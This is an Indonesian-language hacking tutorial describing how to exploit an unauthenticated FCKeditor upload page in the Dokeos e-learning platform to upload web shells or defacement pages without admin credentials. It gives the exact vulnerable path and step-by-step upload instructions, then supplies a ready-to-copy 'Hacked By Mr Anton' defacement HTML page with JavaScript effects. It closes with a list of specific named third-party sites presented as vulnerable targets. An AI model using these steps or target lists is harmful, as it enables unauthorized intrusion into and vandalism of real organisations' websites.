Portail Dokeos adalah semacam FCK editor remote file upload di vulnerability ini hacker bisa mengupload shell ataupun halaman deface , teman-teman dapat mengupload dan melihat halaman deface atau file yang akan di upload pada website tanpa username dan password admin . Oke Langsung aja ke tutorialnya ..
Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
INI CONTOH HTML SAYA BOLH ANDA COPAS:
- pergi ke : http://taget teman/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- Ganti ASP ke PHP kemudian > klik browse > kemudian pilih file yang ingin teman upload > kemudian klik upload. Teman-Teman Bisa mengupload File Yang Berkstensi : PHP,HTML,JPG, Dan TXT
- Untuk melihat Hasil File yang sudah di upload pergi ke : http://website/patch/main/upload/file sobat
Quote:<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Hacked By Mr Anton </title><link rel="SHORTCUT ICON" href="http://images.harianjogja.com/2012/04/anonymous-370x298.jpg">
</head><body bgcolor=black><center>
<br>
<img src="http://muhammadhamdydotcom.files.wordpress.com/2012/02/hackklikteam.jpg" ><br><br>
<a href="http://wwwmranton.blogspot.com/"><object type="application/x-shockwave-flash" width="17"
height="17"data="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/845781339697081.mp3&autoplay=true"><param name="movie"value="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/845781339697081.mp3&song_title=uploadmusic.org&autoplay=true"
/></object>
<script language="JavaScript">
/*
An object-oriented Typing Text script, to allow for multiple instances.
A script that causes any text inside any text element to be "typed out", one letter at a time. Note that any HTML tags will not be included in the typed output, to prevent them from causing problems. Tested in Firefox v1.5.0.1, Opera v8.52, Konqueror v3.5.1, and IE v6.
Browsers that do not support this script will simply see the text fully displayed from the start, including any HTML tags.
Functions defined:
TypingText(element, [interval = 100,] [cursor = "",] [finishedCallback = function(){return}]):
Create a new TypingText object around the given element. Optionally
specify a delay between characters of interval milliseconds.
cursor allows users to specify some HTML to be appended to the end of
the string whilst typing. Optionally, can also be a function which
accepts the current text as an argument. This allows the user to
create a "dynamic cursor" which changes depending on the latest character
or the current length of the string.
finishedCallback allows advanced scripters to supply a function
to be executed on finishing. The function must accept no arguments.
TypingText.run():
Run the effect.
static TypingText.runAll():
Run all TypingText-enabled objects on the page.
*/
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true; // Never run.
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 20 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
return;
}
if(this.currentText == "") this.element.innerHTML = "";
// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<b><font face=Agency FB color=red size=4> ========================================================= <br> </font>
<font face=Agency FB color=white size=3> ++++| YOU HAVE BEEN HACKED |++++ <br> </font>
<font face=Agency FB color=white size=3> ++++| BY |++++ <br> </font>
<font face=Agency FB color=white size=3> ++++| Mr.Anton |++++ <br> </font>
<font face=Agency FB color=red size=4> ========================================================= <br></font>
<br>
<font face=Agency FB color=white size=3>
++++ | THANKS TO |</font><font face=Agency FB color=red size=3> ALLAH SWT |++++<br>
<font face=Agency FB color=white size=3>
++++ | THANKS TO |</font><font face=Agency FB color=red size=3> http://wwwmranton.blogspot.com |++++<br>
<font face=Agency FB color=white size=3>
++++ | THANKS TO |</font><font face=Agency FB color=red size=3> cyber4rt Lampung |++++<br>
<font face=Agency FB color=white size=3>
++++ | THANKS TO |</font><font face=Agency FB color=red size=3> Hacker Indonesia |++++<br>
<br>
<b><font face=Agency FB color=red size=4> ========================================================= <br> </font>
<br>
<br>
<font face=Agency FB color=white size=15><b>
<marquee width=75%> -| I'm ANTON (Indonesian Hacker) |-</marquee></br></font>
</p><script type="text/javascript">
//Define first typing example:
new TypingText(document.getElementById("example1"));
//Define second typing example (use "slashing" cursor at the end):
new TypingText(document.getElementById("example2"), 50, function(i){
var ar = new Array("_"," ","_","_"); return " " + ar[i.length %
ar.length]; });
//Type out examples:
TypingText.runAll();
</script>
<script language="JavaScript" type="text/javascript">
<!--
var rows=1; // must be an odd number
var speed=10; // lower is faster
var reveal=2; // between 0 and 2 only. The higher, the faster the word appears
var effectalign="default" //enter "center" to center it.
/***********************************************
* The Matrix Text Effect- by Richard Womersley (http://www.mf2fm.co.uk/rv)
* This notice must stay intact for use
* Visit http://www.dynamicdrive.com/ for full source code
***********************************************/
var w3c=document.getElementById && !window.opera;;
var ie45=document.all && !window.opera;
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
var m_coch=new Array();
var m_copo=new Array();
function matrix() {
if (!w3c && !ie45) return
var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
ma_txt=" "+ma_txt+" ";
columns=ma_txt.length;
if (w3c) {
while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
ma_tab=document.createElement("table");
ma_tab.setAttribute("border", 0);
ma_tab.setAttribute("align", effectalign);
ma_tab.style.backgroundColor="#000000";
ma_bod=document.createElement("tbody");
for (x=0; x<rows; x++) {
ma_row=document.createElement("tr");
for (y=0; y<columns; y++) {
matemp=document.createElement("td");
matemp.setAttribute("id", "Mx"+x+"y"+y);
matemp.className="matrix";
matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
ma_row.appendChild(matemp);
}
ma_bod.appendChild(ma_row);
}
ma_tab.appendChild(ma_bod);
matrix.appendChild(ma_tab);
} else {
ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
for (var x=0; x<rows; x++) {
ma_tab+='<t'+'r>';
for (var y=0; y<columns; y++) {
ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
}
ma_tab+='</'+'tr>';
}
ma_tab+='</'+'table>';
matrix.innerHTML=ma_tab;
}
ma_cho=ma_txt;
for (x=0; x<columns; x++) {
ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
m_copo[x]=0;
}
ma_bod=setInterval("mytricks()", speed);
}
function mytricks() {
x=0;
for (y=0; y<columns; y++) {
x=x+(m_copo[y]==100);
ma_row=m_copo[y]%100;
if (ma_row && m_copo[y]<100) {
if (ma_row<rows+1) {
if (w3c) {
matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
matemp.firstChild.nodeValue=m_coch[y];
}
else {
matemp=document.all["Mx"+(ma_row-1)+"y"+y];
matemp.innerHTML=m_coch[y];
}
matemp.style.color="#33ff66";
matemp.style.fontWeight="bold";
}
if (ma_row>1 && ma_row<rows+2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
matemp.style.fontWeight="normal";
matemp.style.color="#00ff00";
}
if (ma_row>2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
matemp.style.color="#009900";
}
if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
else if (ma_row<rows+2) m_copo[y]++;
else if (m_copo[y]<100) m_copo[y]=0;
}
else if (Math.random()>0.9 && m_copo[y]<100) {
m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
m_copo[y]++;
}
}
if (x==columns) clearInterval(ma_bod);
}
function zoomer(ycol) {
var mtmp, mtem, ytmp;
if (m_copo[ycol]==Math.floor(rows/2)+1) {
for (ytmp=0; ytmp<rows; ytmp++) {
if (w3c) {
mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
mtmp.firstChild.nodeValue=m_coch[ycol];
}
else {
mtmp=document.all["Mx"+ytmp+"y"+ycol];
mtmp.innerHTML=m_coch[ycol];
}
mtmp.style.color="#33ff66";
mtmp.style.fontWeight="bold";
}
if (Math.random()<reveal) {
mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
}
if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
m_copo[ycol]+=199;
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]>200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
}
mtmp.style.fontWeight="normal";
mtem.style.fontWeight="normal";
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
if (m_copo[ycol]>100 && m_copo[ycol]<200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
mtmp.firstChild.nodeValue=String.fromCharCode(160);
mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
mtem.firstChild.nodeValue=String.fromCharCode(160);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
mtmp.innerHTML=String.fromCharCode(160);
mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
mtem.innerHTML=String.fromCharCode(160);
}
setTimeout("zoomer("+ycol+")", speed);
}
}
// -->
setTimeout('matrix()', 1);
col=0;
function fadein()
{
document.getElementById("fade1").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade2").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade3").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade4").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade5").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade6").style.color="rgb(" + col + ",0,0)";
col+=5;
if(col<255) setTimeout('fadein()', 1);
if(col==255) setTimeout('fadeout()', 1);
}
function fadeout()
{
document.getElementById("fade1").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade2").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade3").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade4").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade5").style.color="rgb(" + col + ",0,0)";
document.getElementById("fade6").style.color="rgb(" + col + ",0,0)";
col-=5;
if(col>0) setTimeout('fadeout()', 1);
if(col==0) setTimeout('fadein()', 1);
}
setTimeout('fadein()', 1);
</script>
Situs Lain Yang Memiliki Vulnerability :
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
hasilnya kayak gini
Sekian Dulu ya, Kawan :D ( ma'af Tutorialnya Jelek ) , semoga bermanfaat :D
